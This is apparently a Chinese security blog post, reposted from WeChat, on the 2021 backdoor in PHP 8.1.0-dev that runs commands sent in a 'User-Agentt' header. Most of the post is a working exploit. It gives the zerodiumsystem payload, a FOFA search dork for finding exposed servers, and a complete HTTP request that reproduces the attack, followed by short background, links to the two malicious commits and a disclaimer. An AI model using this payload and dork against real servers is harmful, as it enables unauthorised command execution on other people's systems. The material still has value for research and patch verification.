|
今天,继续讲一个鲜为人知但有价值的漏洞。
01
漏洞概述
HTTP Header User-Agentt 字段存在命令执行后门
payload:
User-Agentt: zerodiumsystem(
'id'
);
02
FOFA Dork
FOFA Dork: "PHP/8.1.0-dev"
03
漏洞复现
GET
/
HTTP/1.1
User-Agentt
: zerodiumsystem('echo 666pHp');
Accept
: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Encoding
: gzip, deflate, br
Accept-Language
: zh-CN,zh;q=0.9
Connection
: keep-alive
04
漏洞资料
PHP 8.1.0-dev版本于2021年3月28日发布时曾被发现存在后门问题。在php-src存储库中提交了两个恶意的代码更改,但随后被及时发现并成功清除。这一事件突显了对于软件安全的持续关注和及时响应的重要性。对于软件安全问题,我们建议及时关注官方通告,确保及时应用安全补丁,以维护系统和应用的稳健性
两个恶意提交Commit记录如下:
https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d
https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
原文始发于微信公众号(一个不正经的黑客):【后门】PHP 8.1.0-dev 命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论